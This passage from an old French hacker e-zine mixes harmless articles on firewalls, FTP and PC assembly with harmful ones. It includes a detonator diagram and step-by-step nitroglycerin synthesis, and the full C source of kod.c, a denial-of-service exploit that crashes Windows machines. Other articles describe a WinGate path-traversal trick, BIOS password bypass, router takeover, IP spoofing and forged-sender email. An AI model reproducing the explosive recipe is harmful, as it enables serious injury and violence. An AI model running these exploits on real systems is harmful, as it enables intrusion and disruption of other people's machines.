autorisees ou refusees. Tous les  autres examens de paquets sont effectues par
les "Bastion Host". Le routeur fait  baisser le traffic vers le bastion host
et allege le travail en diminuant le nombre  d'algorithmes a executer. 
Physiquement, le Screened Host est un routeur avec une connexion sur l'exterieur 
et une connexion vers un "Bastion Host". Le Bastion Host a une connexion avec
le  routeur et une connexion sur le reseau interne. 
Les desavantages : S'il est seul, il peut devenir un goulot d'etranglement. 
Si le systeme hote tombe, 
la passerelle entiere tombe avec. 


Screened Subnet Firewalls

Avec plusieurs autres routeurs et Bastion Hosts, on forme une batterie de 
pont-levis a un reseau. Physiquement plus difficile a representer, mais un
resultat plus securise dans un environnemt robuste. Normalement il se
constitue comme suit : Un routeur avec une connexion sur le reseau exterieur
et une autre sur un Bastion Host. Le bastion Host a une connexion sur le
routeur le plus proche de la sortie et une connexion sur un autre bastion
host, avec une connexion réseau adressable au milieu.  Le bastion host le plus
proche de l'intérieur a une connexion vers le bastion host le plus proche de
la sortie et une autre connexion sur un routeur interne. Le routeur interne a
une connexion vers le Bastion host le plus proche de l'entree du réseau
interne. Le resultat de cette configuration tortueuse est que les composants
de securite ne bogguent jamais, et toutes les adresses ip internes sont 
invisibles de l'exterieur, evitant ainsi toute possibilite de "mapping". Les
desavantages :  Le prix (deux a trois fois plus cher). L'implementation doit
etre faite par un professionnel de la securite. A deconseiller aux newbies.  Du
point de vue client, un serveur proxy est une application qui se substitue aux
ressources reseau en se faisant passer pour l'emetteur/recepteur. Du point de
vue reseau, le serveur proxy accede aux ressources en se faisant passer pour
le client. Les firewall a niveau applicatif peuvent aussi controler un traffic
entre deux réseaux. Ils sont aussi capable de proposer des fonctions comme les
mesures d'audit et de logging avance. Les statistiques sont plus détaillées
mais generalement ne le font pas si bien que ca. C'est avant tout un programme
qui s'execute sur une machine qui est attaquable et plantable; le cas echeant,
vous crashez le firewall avec. A utiliser en complement avec des firewalls
network level.

------------------------------------------------------------------------------
*9******************* Organisez vos reunions de hack *************************
----------------------------------| 3D13 |------------------------------------

Pour bouger l'underground francais, je vais vous expliquer comment organiser
vos petites reunions, d'abord, le premier obstacle : la salle de reunion,
pensez bien que vous n'allez pas inviter tout le monde chez vous !!, un usine
desafectee fera tres bien l'affaire, meme si ca sent pas tres bon. Evitez
d'inviter des lamers car il y a rien de mieux pour vous attirer la police,
croyez-en mon experience personnelle. Aussi, prevenez au moins 2 mois a
l'avance. Lancez vos invitation par e-mail, et ne les donnez les pas a
n'importe qui, il faut d'abord que vous connaissez la personne a qui vous
l'envoyez, pas forcement personnellement mais par exemple, sur ses travaux
effectues au sein de l'underground. Faites ca de nuit bien sur, mais aussi,
dans certains entrepots desafectes, vous pourrez avoir a faire a des gangsters
qui seront pas forcements tres corrects avec vous... mais au moins, c'est le
meilleur moyen d'apprendre et de poser vos questions directement a la
personne, pour l'instant, je les organise de la facon suivante :
- chaque personne arrive avec au moins 1 expose a presenter devant tout le
monde.
- pas de retard, l'heure c'est l'heure, si votre rendez-vous est a minuit, et
qu'un personne arrive a minuit cinq, refusez-le car ca peut etre un policier
deguise.
- Tous les exposes doivent etre accompagnes d'exemples concrets et precis.
- La reunion ne dure pas plus de 3 heures, plus elle est courte, mieux c'est.
- Boissons, gateaux sont les bienvenus.

------------------------------------------------------------------------------
*10**************** Cracker son password BIOS pas MS-DOS *********************
------------------------------| Clad Strife |---------------------------------

Bon... Il y a trois solutions pour buter son ch'tit password Bios. 

1.  En devissant le boitier, en trouvant la batterie du Bios, en faisant
ejecter  celle-ci. Ou encore trouver le cavalier qui permet d'effacer de la
mémoire le contenu de la carte mere et le faire commuter. Celà peut ne pas
marcher si le boitier est ferme à clefs, si la batterie est intégrée au
composant qui stocke le contenu des reglages etc...  
2.  On peut aussi essayer de décrypter le
password du Bios, la il faudra faire appel à des programmes ou à des
techniques différentes...  
3.  Héhé, la vraie technique que l'on va aborder:
modifier le CONTENU  de la mémoire du Bios, avec un programme fourni le plus
souvent avec le système d'exploitation... Mais n'oubliez pas de lancer le
programme avec le pc allumé ici!

 En fait le Bios dispose d'une mémoire appelée CMOS. En general ils ont a 
leur disposition une procedure de controle qui verifie au démarrage
l'integrite des donnees de la memoire... regardez sur votre ecran au
demarrage: un message tel que Bios Installed Succesfully devrait generalement
s'afficher. Cette procedure s'appelle la "CMOS Cheksum" et donne donc lieu à
une "CMOS Cheksum Error", si il y a des blems! Dans ces cas le Bios va tenter
de réinitialiser la CMOS avec des valeurs par défaut. Justement: en general
l'option par défaut pour le mot de passe est de desactiver celui-ci! Il
existera mais ne sera pas demande à l'amorcage. Mais ceci valable non
seulement avec le mot de passe standard mais aussi avec le mot de passe qui
permet de rentrer dans le Setup. Alors comment modifier le CMOS??? Eh ben via
les ports d'entree-sortie, c'est à dire les ports peremettant directement de
communiquer avec un element materiel sans passer par l'OS. Les ports qui nous
interesse sont les ports 70h et 71h . Pour acceder en lecture ou en ecriture
a un octet de la CMOS, il faut d'abord indiquer au Bios quel octet on desire
atteindre. Ceci se fait par un acces en ecriture sur le port 70h avec le
numero de l'octet. Un acces en lecture ou en ecriture au port 71h permettra
alors de lire ou d'ecrire sur l'octet considere... Hehe, on a besoin de
programmes pour ça nan? eh oui! Microsoft est assez con pour filer de quoi
pirater ses propres utilitaires. Car nous allons utiliser Debug, fourni avec
Ms-Dos. Problème! Certains Bios semblerait immunisés contre le Cheksum Error.
Impossible d'operer alors. Ce sont essentiellement des Bios de marque comme
les Bios qui equipent les HP Vectra et dont les informations relatives au mot
de passe ne se trouvent pas dans la CMOS mais dans un autre memoire de meme
type.   

MODIFIER LE CMOS AVEC DEBUG: 
Depuis la ligne de commande sous Ms-Dos tapez: DEBUG. 
Pour avoir de l'aide tapez '?'. La commande a utiliser pour realiser un acces 
en ecriture sur un port est: O port valeur (les valeurs sont à rentrer en
hexadecimal et sans le 'h'). Essayer de taper dans l'intervalle standard avec
un truc du genre:  
O 70 20  
O 71 66 
Si ca ne marche pas essayez d'autres octets.

------------------------------------------------------------------------------
*11************************* Le FTP sous MS-DOS ******************************
------------------------------| Clad Strife |---------------------------------

Vague article qui expliquera peut-etre qu'on peut faire du FTP sous Ms-Dos,
et ce qu'on peut y faire surtout.  Allez sous Ms-Dos et de la tapez: 
ftp 
ftp> open 
(to) www.url.com 
Normalement apres ca on vous demandera unb login et un password. Sur les
comptes  ou l'on peut rentrer en anonyme le nom d'user sera: anonymous 
et l'e-mail: le votre ou un e-mail bidon. 
Vous aurez alors accès au compte restreint pours les utilisateurs anonymes. Si 
il n'y a pas de session [anonymous], alors la connection sera fermee. 
Vous pouvez essayer de trouve le login de l'administrateur du site, en faisant 
un lookup du serveur ou un peu au hasard. 
Pour aller plus vite tapez: 
ftp 
open www.url.com 
Ainsi vous n'aurez pas à retourner à la ligne [ (to) ] à chaque fois. 
Pour quitter la session FTP de DOS tapez: bye 

------------------------------------------------------------------------------
*12****************************** Anarchie ***********************************
----------------------------------| 3D13 |------------------------------------

I. Creation d'un detonateur

Amusons nous un peu a terroriser le peuple francais, connu pour sa reputation
de gueulards, d'ailleurs :
Vous connaissez pourquoi les francaises ont des petits seins ?
Parce que les francais ont des petites mains et une grande gueule
Je vais vous detailler le schema d'un detonateur :

LE DETONATEUR A LIBERATION DE TENSION :
 _____________________________
|   __________   __________   |     1. Amorce d'explosion
|  |          | |          |  |     2. Plaque de metal
|  |  PILE  1 | |  PILE 2  |  |     3. Bras en metal
|*<           |<           ** |     4. Piles 4,5 V
|* |     4    | |     4    |* |     *. Fil metalique
|* |__________| |__________|* |
|*___________________********_|
|*___ ___ |__       *         |
|*|D| |D| |  |   __*          |
|*|Y| |Y| |2 |  / /           |
|*|N| |N| |__| / /            |
|*|A|_|A| |___/ /             |
|****1--|  _3__/              |
| |M|-|M| |                   |
| |Y| |Y| |                   |
| |T| |T| |                   |
| |E| |E| |                   |
| |_| |_| |                   | 
|_________|___________________|


II. Comment faire de la nytroglycerine ?
Voici un petit texte en anglais, j'ai peur de faire des fautes de traduction
alors essayez de comprendre, je n'ai pas demande l'avis de cet auteur pour
mettre son texte et je peux pas mettre son nom ici car il est anonyme, mais
c'est pas moi qui l'ai fait 

1. FILL A 75-MILLILITER BEAKER TO THE 13 ML. LEVEL WITH FUMING RED  NITRIC
ACID, OF 98% PURE CONCENTRATION.          
2. PLACE THE BEAKER IN AN ICE BATH AND ALLOW TO COOL BELOW ROOM TEMP.   
     3. AFTER IT HAS COOLED, ADD TO IT THREE TIMES THE AMOUNT OF FUMING SULFERIC 
ACID (99% H2SO4).IN OTHER WORDS, ADD TO THE NOW-COOL FUMING NITRIC ACID 39
ML. OF FUMING SULFERIC ACID.  WHEN MIXING ANY ACIDS, ALWAYS DO IT SLOWLY AND
CAREFULLY TO AVOID  SPLATTERING.    
     4. WHEN THE TWO ARE MIXED, LOWER THIER TEMP. BY ADDING MORE ICE TO THE 
BATH, ABOUT 10-15 DEGREES CENTIGRADE. (USE A MERCURY-OPERATED THERMOMETER) 
  
     5. WHEN THE ACID SOLUTION HAS COOLED TO THE DESIRED TEMPERATURE, IT IS 
READY FOR THE GLYCERIN. THE GLYCERIN MUST BE ADDED IN SMALL AMOUNTS USING A
MEDICINE DROPPER.  (READ THIS STEP ABOUT 10 TIMES!)  GLYCERIN IS ADDED SLOWLY
AND CAREFULLY (I MEAN CAREFUL!) UNTIL THE ENTIRE SURFACE OF THE ACID IT
COVERED WITH IT.          
    6. THIS IS A DANGEROUS POINT SINCE  THE NITRATION WILL TAKE PLACE AS SOON
 AS THE GLYCERIN IS ADDED. THE NITRATION  WILL PRODUCE HEAT, SO THE SOLUTION
MUST  BE KEPT BELOW 30 DEGREES CENTIGRADE! IF THE SOLUTION SHOULD GO ABOVE 30 
DEGREES,  IMMEDIATELY DUMP THE SOLUTION INTO THE ICE BATH!  THIS WILL INSURE 
THAT IT DOES NOT GO OFF IN YOUR FACE! 
  
     7. FOR HTE FIRST TEN MINUTES OF NITRATION, THE MIXTURE SHOULD BE GENTLY 
STIRRED.  IN A NORMAL REACTION THE NITROGLYCERIN WILL FORMAS A LAYER ON 
TOP OF THE ACID SOLUTION, WHILE THE SULFERIC ACID WILL ABSORB THE EXCESS 
WATER. 
  
     8. AFTER THE NITRATION HAS TAKEN PLACE, AND THE NITROGLYCERIN HAS FORMED 
ON THE TOP OF THE SOLUTION, THE ENTIRE BEAKER SHOULD BE TRANSFERRED SLOWLY AND 
CAREFULLY TO ANOTHER BEAKER OF WATER. WHEN THIS IS DONE THE NITROGLYCERIN 
WILL SETTLE AT THE BOTTEM SO THE OTHER ACIDS CAN BE DRAINED AWAY. 
  
     9. AFTER REMOVING AS MUCH ACID AS POSIBLE WITHOUT DISTURBING THE 
NITROGLYCERIN, REMOVE THE NITROGLYCERIN WITH AN EYEDROPPER AND PLACE IT IN A 
BICARBONATE OF SODA (SODIUM BICARBONATE IN CASE YOU DIDN'T KNOW) SOLUTION. THE 
SODIUM IS AN ALKALAI AND WILL NUETRALIZE MUCH OF THE ACID REMAINING. 
THIS PROCESS SHOULD BE REPEATED AS MUCH AS NECESARRY USING BLUE LITMUS PAPER TO 
CHECK FOR THE PRESENCE OF ACID. THE REMAINING ACID ONLY MAKES THE NITROGLY- 
CERIN MORE UNSTABLE THAN IT ALREADY 
IS. 
  
     10. FINALLY! THE FINAL STEP IS TO REMOVE THE NITROGLYCERIN FROM THE BI- 
CARBONATE.  HIS IS DONE WITH AND EYE-DROPPER, SLOWLY AND CAREFULLY.  THE 
USUAL TEST TO SEE IF NITRATION HAS BEEN SUCCESSFUL IS TO PLACE ONE DROP OF THE 
NITROGLYCERIN ON METAL AND IGNITE IT. IF IT IS TRUE NITROGLYCERIN IT WILL 
BURN WITH A CLEAR BLUE FLAME. 
  
** CAUTION ** 
NITRO IS VERY SENSATIVE TO DECOMPOSITION, HEATING DROPPING, OR JARRING, AND 
MAY EXPLODE IF LEFT UNDISTURBED AND 
COOL. 
  
------------------------------------------------------------------------------
*13************************* Ecrivez-vous en LAN *****************************
----------------------------------| 3D13 |------------------------------------

LAN = Local Area Network, reseau local, mais ca marche quand meme sur le net,
mais avec FT, c'est fuckement trop cher, alors il vaut mieux rester en local.
Il existe des commandes sympas sous Unix qui permettent de parler avec
d'autres gars, cela dit, pour les utilisateurs de windows, il existe winpopup
(Demarrer/executer/ puis "winpopup").
La premiere, la plus facile est write +nom_utilisateur pour ecrire un court
message a un utilisateur.
Deja, pour avoir la liste des personnes connectees a votre reseau, tapez la
commande who, qui vous donnera un truc dur genre :
root		tty1	Jul	8 20:29
casper  	pts/2   Jul	8 20:46
docnitro 	pts/3	Jul	8 20:48
Ensuite, si vous souhaitez ecrire a docnitro, tapez :
$ write docnitro Salut doc, pourquoi t'es la ?
Attention, le symbole $ n'est pas a taper, c'est simplement pour indiquer la
ligne de commande.
Aussi, veillez a bien faire la difference Majuscules/minuscules car capser
n'est pas Casper ou CASPER.
Ensuite, si vous souhaitez postez un mail a docnitro, tapez
$ mail docnitro
Subject : tapez ici le sujet puis validez
tapez maintenant votre message que vous terminerez par un
.
alors, vous verrez Cc, il s'agit de la personne a laquelle vous souhaitez
aussi envoyer ce message, validez seulement.
pour quitter, tapez q
c'est bon, votre message est envoye, maintenant, pour le lire, loggez vous
sous le nom de la personne et tapez :
$ mail , puis validez
vous verrez la liste des messages, tapez le numero du message a lire.
Pour quitter, tapez encore q.
C tout pour aujourd'hui, ca peut toujours depanner qqn et c'est moins cher que
l'irc si vous souhaitez discuter, surtout si vous etes en LAN !!!

------------------------------------------------------------------------------
*14*************************** Montez votre PC *******************************
----------------------------------| 3D13 |------------------------------------

C'est moins cher que de l'acheter tout monte dans un magasin specialise ou
diversifie (Darty, Leclerc...) et c'est plus rigolo et glorifiant.
Vous pouvez negocier chaque piece, comparer avec d'autres magasins, n'hesitez
pas. Vous pouvez vous servir d'une revue avec des photos ou lire la suite de
ce texte pour commencer. 
D'abord, les pieces a avoir sont, et n'oubliez rien :
- Carte mere
- Processeur
- Memoire RAM
- Carte graphique
- Carte son
- Lecteur de disquettes
- Lecteur de CDROM
- Disque Dur
- Ecran
- Enceintes 
- Boitier+Alimentation
Tout d'abord, si vous avez a visser votre carte mere, utilisez les
surelevateurs fournis, ne vissez pas la carte mere directement plaquee contre
le boitier, sinon Bzzzz-... et c'est pas cool.
Ensuite, pour la carte graphique, si elle est AGP, il se peut que vous ayez le
probleme de mal l'enclencher car il y a encore des petits problemes avec la
norme AGP et parfois, il faut forcer comme un bourrin pour rentrer votre carte.
Avant de visser la carte mere dans le boitier, enclenchez le processeur, la
RAM. Ensuite, ajouter les disques puis les cartes, maintenant, branchez le
tout, en respectant bien la taille des nappes et des fils d'alimentation, cette
fois, ne forcez pas, ca rentre facilement. 
Ensuite, pour demarrer, il vous faut une disquette de boot et le systeme
d'exploitation. avec fdisk, faites vos partitions et installer votre systeme.
C'est pas complique, hein?

------------------------------------------------------------------------------
*15************************ Un exercice pratique *****************************
----------------------------| Clad Strife & 3D13 |----------------------------

Il s'agit d'un article qui a ete cree a la base par Clad Strife pour vous
reveller une faille dont souffrait wingate, mais j'avais besoin de faire un
commentaire pour les debutants afin de la realiser :
Pour pouvoir savoir si la machine attaquee est une cible potentielle, il faut
realiser un scan des ports, vous trouvez des scanners partout, c'est
d'ailleurs l'outil de base que je vous conseille d'acquerir, par exemple, avec
le celebre nmap (que vous trouvez sur www.insecure.org), tapez :
$ nmap cible.com
Note : vous etes pas oblige d'avoir linux pour faire tout ca, du moment que
vous possedez un scanner de ports, c'est bon.
vous aurez la liste des principaux ports ouverts, vous allez donc chercher une
liste detaillee pour savoir si le port 8010 est ouvert, si il est ouvert,
c'est bon, vous avez des chances que ca marche, mais attention, ca peut aussi
ne pas marcher, si par exemple l'administrateur a reconfigure ce port pour y
placer ses outils...
voici maintenant le texte original de Clad Strife :
Wingate comme vous le savez permet à des ordinateurs sous WinNT de partager la 
meme connection Internet. Ainsi on peut savoir que WinGate utilise le port
8010 pour pouvoir agir. Ainsi certaines failles sur les serveurs WinNT,
permettent à n'importe quel utilisateur connecte a Internet et ayant un
navigateur quelconque de voir ce qu'a sur ses drivers un serveur mal protégé
par le port 8010. Alors trouvez un serveur sous WindowsNT et tapez ceci: 
http://www.urlNT.com:8010/c:/  ou httt://www.urlNT.com:8010/..../  ou bien
d'autres choses comme http://www.urlNT.com:8010// 

------------------------------------------------------------------------------
*16*************************** Faille Windows ********************************
----------------------------------| 3D13 |------------------------------------

Il s'agit d'un exploit pour Linux afin d'attaquer un serveur tournant
sous Windows, cela vous permet de bloquer un ou plusieurs ports pour faire un
denial of service, malhereusement, vous pouvez vous en servir comme nuker,
donc evitez cette connerie car c'est un comportement immature, ce code
fonctionne pour Unix/Linux, desole pour ceux qui ont windows :-(  

/*
::: [author] kod.c by klepto/defile  klepto@antisocial.com / defile@EFnet
::: [stuph ] bug found by klepto / total rewrite on *nix platform by defile
::: [notes ] bluescreens windows users(98/98se) and kills tcp stack
::: [m$ bug] windows handles igmp badly and this is the result
::: [greets] amputee/nizda/nyt/ignitor/skyline/codelogic/ill`/conio/egotrip/TFreak/napster
::: [greets] dist(test monkey)/naz(you rule period.)/#havok/#irc_addict/#kgb/#eof/everyone
::: [action] ./kod <host> and BEWM!
::: [rant  ] there will be lots of rewrites to this.. just get our name right!
de omnibus dubitandum
*/

/* 
windows core dump output (*whee*)
An exception 0E has occurred at 0028:C14C9212 in VxD VIP(01) +
00006C72.  This was called from 0028:C183FF54 in VcD PPPMAC(04) +
000079BR.  It may be possible to continue normally(*not*).
*/

/*
there will be more bugs like this until bill "big moneybags" gates
puts more effort into making windows more stable instead of patching holes.
*/

#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

size_t hits = 5;
unsigned short port = 100;

void usage (char *progname)
{
  printf("Usage: %s <host> -p port -t hits\n", progname);
  exit(1);
}

void parse_args (int argc, char *argv[], char **target)
{
	int y;

	*target = argv[1];
	
	if (argv[1][0] == '-') {
		printf ("Must specify a target.\n");
		exit (1);
	}
	for (y=2; y < argc; y++) {
		if (!strcmp(argv[y], "-p")) {
			y++;
			port = atoi (argv[y]);
		} else if (!strcmp(argv[y], "-t")) {
			y++;
			hits = atoi (argv[y]);
		}
	}	
}


int main (int argc, char *argv[])
{
	struct sockaddr_in	sin;
	struct hostent	*he;
	size_t maxpkt = 15000;
	char *target;
	char buf[15000];
	int sd;
	
	if (argc < 2) 
		usage (argv[0]);

	parse_args (argc, argv, &target);

	if ((he = gethostbyname (target)) == NULL) {
		herror (target);
		exit (1);
	}
	memcpy (&sin.sin_addr.s_addr, he->h_addr, he->h_length);
	
	sin.sin_family = AF_INET;
	sin.sin_port = htons (port);
	
	if ((sd = socket (AF_INET, SOCK_RAW, 2)) == -1) {
		perror ("error: socket()");
		exit (1);
	}

	if (-1 == connect (sd, (struct sockaddr *)&sin, sizeof (sin))) {
		perror ("error: connect()");
		close (sd);
		exit (1);
	}

	puts ("Determining max MSGSIZE");
	while (send (sd, buf, maxpkt, 0) == -1) {
		if (EMSGSIZE != errno) {
			perror ("error: send()");
			close (sd);
			exit (1);
		}
		maxpkt -= 1;
	}
	hits--;

	printf ("Max MSGSIZE is %d\n..%d bytes [%s:%d]..\n", maxpkt,
			maxpkt, target, port);
	while (hits--) {
		usleep (50000);
		if (send (sd, buf, maxpkt, 0) == -1) {
			perror ("error: send()");
			close (sd);
			exit (1);
		}
		printf ("..%d bytes [%s:%d]..\n", maxpkt, target, port);
	}

	sleep (1);
	close (sd);
	puts ("complete.");
	
	exit (0);
}

compilation : cc ou gcc
	      gcc kod.c -o kod	
------------------------------------------------------------------------------
*17******************** Hackez des routeurs par telnet ***********************
------------------------------| Clad Strife |---------------------------------

1°/ Introduction. 
2°/ Introduction aux modèles OSI. 
3°/ Les fonctions des couches OSI et le réseau. 
4°/ les Routeurs et leurs hacking. 
5°/ L'IP spoofing. 
6°/ Le social engeneering. 
 
1°/ INTRODUCTION
Alors ce que vous allez trouver dans ce zine vous n'allez pas devoir l'appliquer 
etc... Pour preuve: un de mes potes travaille au SCSSI (Service Central de la
Sécurité des Systèmes d'Information ), d'ailleurs le jour ou il va lire ce
fichier il va m'dechirer et j'vais m'faire coffrer, et donc ce gars j'peux
vous dire qu'il va pas s'f'aire chier si vous faites des bidouilles... Bon
j'vais pas vous faire chier avec mes conneries...  Tout ce que je
vousconseille c de ne pas appliquer ce qui est écrit ci dessous... d'ailleurs
je donnerais plus d'informations techniques que d'astuces de hacking... Va
falloir apprendre a s'demmerder... d'ailleurs si tu lis ce txt c que z'etes
deja pas mal avance.  Courte intro... au fait (j'dis ça histoire de meubler la
place qui m'reste de place), ci ce texte est en français c parce que les
francophone en ont ras-l'bol de devoir lire des txt en english: la moitié des
gens pigent rien (j'en sais quelquechose). Bon ce txt est  protege par le
copyright: tu peux le modifier, ecrire dessus, gribouiller, meme chier dessus
si ca t'amuses, mais tu mets mon nom ok??? Nan parce que sinon ca vous f'rais
pas chier vous d'savoir que votre boulot n'est pas reconnu? *comment ça
non???* :))  Putain... j'vous emmerde avec mes paroles de merde alors que
j'parle même pas de trucs intéressants??? Ok bon, c'est partii!  

2°/ Introduction aux modèles OSI  
Bon sang: faut que je r'devienne sérieux la... 
Nan parcequ'en fait ça va devenir corse!!! Qu'est-ce qu'un modele OSI...
C'est un plan de base mis au point par l'ISO (International Standard
Organization), qui definit comment seront envoyes les packets
d'informations... Ce modele est compose de 7 couches: la couche d'application,
de presentation, de session, de transport, la couche reseau, la couche liaison
et la couche physique! J'vais pas decrire a quoi sert chaque couche sinon t'en
as pour des heures à l'finir ce txt. Alors on va juste s'interesser aux 3
couches les plus basses (la 1, la 2 et la 3), donc la couche reseau, la couche
liaison, la physique. Chacune de ces trois couches est en communication avec
les autres couches de même nom d'un autre modèle OSI. 

La couche réseau: c'est ce qui permet de fournir les moyens d'établir, de 
maintenir et de liberer des connexions de reseau. Elle permet l'acheminement
des packets d'informations via le réseau. L'adressage du reseau est fait par
les routeurs. Donc les infos passent par les routeurs eux-memes... En devenant
l'administrateur d'un routeur on peut en juger que: on peut recevoir les
informations, détourner l'adressage du réseau, etc... En devenant
l'administrateur d'un routeur on devient "l'BigBosss" :)) 

La couche Liaison et la couche Physique nous interesse moins vu que c'est pas
la qu'on y trouvera les routeurs ^_^

Voila comment se presente le modele OSI en liaison avec un autre modele OSI: 
 

=================             ================= 
| 7 APPLICATION |             |   APLICATION  | 
=================             ================= 
| 6 PRESENTATION|             |  PRESENTATION | 
=================             ================= 
|   SESSION   5 |             |   SESSION     | 
=================             ================= 
|   TRANSPORT 4 |             |   TRANSPORT   | 
=================             ================= 
|   RESEAU    3 |-------------|    RESEAU     | 
=================             ================= 
|   LIAISON   2 |-------------|   LIAISON     | 
=================             ================= 
|   PHYSIQUE  1 |-------------|   PHYSIQUE    | 
=================             ================= 
 

Bon, un packet d'information va passer par chaque couche avant d'etre envoye 
via les couches de communications... Ces informations seront encapsulées
(=enfermees), dans une "enveloppe"... Le protocole (le protocole X25 en fait)
va définir la façon dont l'adresse va être écrite sur l"enveloppe"... En fait
un protocole définit les règles d'adressage du packet de données.    

3°/ Les fonctions des couches OSI et le réseau 
Bon je voulais passer les fonctions des couches mais mon pote me gueule
dessus pour que j'te raconte leurs fonctions.  on va meme definir celle
RESEAU, meme que ça a ete fait ci-haut. Mais abrégeons ^_^: 

La couche Application: elle gere le transfert d'informations entre programmes. 
La couche Présentation: elle s'occupe de la mise en forme des textes et des 
                        conventions d'affichage. 
La couche Session: elle s'occupe de l'établissement, de la gestion, de la 
                   coordination des communications. 
La couche Transport: elle gere la remise correcte des informations. 
La couche Réseau: elle determine les routes de transport et s'occupe du 
                  traitement et du transfert de messages. 
La couche Liaison de donnees: elle s'occupe de du codage, de l'adressage, et 
                              de la transmission des informations. 
La couche Physique: elle gere les connections matérielles.

4°/ les Routeurs et leurs hacking
 OUEEEEE! enfin du pur de dur! Le routeur... Comme explique ci-haut il permet 
d'indiquer par ou va passer le reseau... (Cependant certaines entreprises
offres d'autres services que vous pourrez consulter sur le net...) du moins
c'est cette info qui nous intéresse car en devenant l'administrateur d'un
routeur il est évident qu'on peut changer l'adressage du reseau, et ainsi de
recuperer les informations de la plus haute importance * fantasmez pas là! :)
*, mais en devenant l'administrateur du reseau on est quasiment le MASTER DU
SYSTEME!!!  YEAH!!! TU KIFFES CA HEIN? Hehem... bon le tout pour trouver
l'adresse d'un routeur est d'abord de trouver le reseau nan? très simple...
z'avez l'url: www.perdu.com, merde comment avoir la liste des routeurs de
perdu.com? Vous tracez sous dos www.perdu.com de manière à avoir l'adresse IP
du site: 207.181.252.100. Sur cette IP seul 207.181 nous intéresse: c ca qui
definit l'adresse du reseau... Ainsi on va scanner tout ce qui est sur ce
réseau. De nombreux programmes font ça (le meilleur: WS PING PRO PACK sur
http://www.ipswitch.com), et on en scannant uniquement ce qui est SNMP on a: 
207.181.252.095 SNMP  207.181.252.161 SNMP  207.181.252.191 SNMP 
207.181.252.192 SNMP  207.181.252.193 SNMP  207.181.252.223 SNMP  
Ce qui n'est qu'une petite partie des routeurs.       

Pas trop puissant ca? Bien sur j'vous déconseille encore une fois de deconner
avec ça... enfin:  vous voilà prevenu. Maint'nant si vous vous en petez les
couilles :)) Eh oui car chaque connexion OU tentative de connexion est
enregistree avec votre IP... Rien n'est simple... C'est pour ça qu'il existe
le spoofing!!! Kézako??? Vous voulez l'savoir??? Bof, c simple, mais j'vais
vous expliquer ca a la fin de ce chapitre. Now je vais vous expliquer:  
-comment te connecter à un routeur.  
- sous quel environnement.  
- que faire sur le routeur.       

BON... On s'connait bien maintenant: j'vais vous tutoyer! 
Comment se connecter à un routeur: c simple. Une fois que t'as trouve
l'adresse  d'un routeur: tu te connectes a lui via telnet sur le port SNMP.
Ensuite tu vas devoir utiliser TES methodes (chacun ses methodes) pour trouver
les passwords et les pass. Moi pour les logins je fais un lookup de l'adresse
IP, pour les pass utilisez l'art du sniffing. Sous quel environnement???
(j'lavais oublié cette question là!) telnet bien sur!  Que faire sur le
routeur, bah ce que t'as envie... en fait j'pensais inclure ici une partie du
texte de NeurAlien, mais il préfère qu'on l'oublie alors j'mets rien du tout
(le mieux est de taper help pour avoir la liste d'options).    

5°/ L'IP
spoofing Bon l'IP spoofing ça consiste en koi? Prenons "Marcel" qui a un
compte sur la Machine A, et "Rene" un compte sur la Machine B. "Rene" arrive à
se connecter à la Machine B sans procédure d'indentification car celle-ci
reconnait son IP! donc si "Marcel" veut s'ramener sur la Machine B va falloir
qu'il se fasse identifier comme étant "rene", prendre son IP koi. Now, c à ton
tour Bond!!!   

VOICI UN TEXTE EN ANGLAIS POUR NOUS AIDER: 

------------------------------------------------------------------------------- 
 

To inet-access@earth.com 
From "Philip J. Nesser II" <pjnesser@martigny.ai.mit.edu> 
Date Fri, 18 Apr 1997 01:34:41 -0400 (EDT) 
In-Reply-To <199704180202.TAA11037@rgate.metricom.com> from "
Matthew James Gering" at Apr 17, 97 06:59:58 pm 
Phone (206)481-4303 
Reply-To inet-access@earth.com 
Sender inet-access@earth.com 
Us-Nail 13501 100th Ave NE, Suite 5202, Kirkland, WA 98034 
 

------------------------------------------------------------------------------- 
 

Matthew James Gering supposedly said: 
> 
> Would not filtering the outgoing packets on a particular network such that 
> only packets that have source addresses that originate on that network 
> would be allowed to pass, prevent the spoofing of outside addresses? 
> 
> Is there any negative impact of doing so? If not, why is this not common 
> practice? 
> 
> ie. If I own xyz/24 and my upstream connection(s) filters to permit only 
> xyz/24 through my link(s), I could not hide the souce network of my 
> packets. 
> 
>       Matt 
> 
 
Matt, 
 

Its a good idea in general.  You might even say its a network friendly 
practice.    You can see Paul Ferguson's draft at 
ftp://ds.internic.net/internet-drafts 

If you happen to use IP mobility support its a problem, but other than that 
go for it. 
 
--->  Phil 
 
============================== ISP Mailing List ============================== 
Email ``unsubscribe'' to inet-access-request@earth.com to be removed. 
Changed email addresses? Use the ``unsubscribe <my_old_address@foo.dom>'' 
form. 
------------------------------------------------------------------------------ 
------------------------------------------------------------------------------ 
 
Ok c compris?

------------------------------------------------------------------------------
*18**************** Envoyez des mails anonymes par telnet ********************
------------------------------| Clad Strife |---------------------------------

Envoyer des mails anonymes par Telnet, consiste en realite a se connecter à
un serveur quelquonque qui accepte les connections telnet par le protocole
SMTP (Simple Mail Transfer Protocol). ce protocole utilise le port 25 (on dit
ceci par convention mais le port n'appartient pas au protocole), donc voici ce
que vous devez faire. Vous devez vous connecter a un serveur
(www.moncourrier.com par exemple), sur le port 25 en terminal vt100 (le plus
utilisé). 

Une fois connecte vous entrez les commandes suivantes :
Le serveur en premier va dire: 
220 imedia.vdl2.ca ESMTP Sendmail 8.8.5/8.8.5; Sun, 20 Jun 1999 10:32:21 -0400 
(pour s'identifier) 
Répondez: 
HELO hotmail.com 
(Pour vous identifier en tant "qu'Hotmail", Hotmail n'est qu'un exemple) 
Réponse du serveur: 
250 imedia.vdl2.ca Hello adresse.tcp.serveur.com [VOTRE IP], pleased to meet you 
(Pour dire qu'il vous a reconnu) 
Répondez: 
mail from: hahaha@lol.com (Pour donner l'adresse de l'expéditeur) 
Réponse du serveur: 
250 hahaha@lol.com... Sender ok (Okay, il accepte l'adresse de l'expéditeur) 
Répondez: 
rcpt to: lamer@uhc.com (l'E-mail de la victime) 
Réponse du serveur: 
250 lamer@uhc.com... Recipient ok (l'E-mail de la victime a été accepté) 
Répondez: 
data (On peut caractériser cette commande comme la fin de saisie des données) 
Réponse du serveur: 
354 Enter mail, end with "." on a line by itself
(A la fin de votre message vous devrez mettre un point à la ligne) 
Répondez par votre message: 
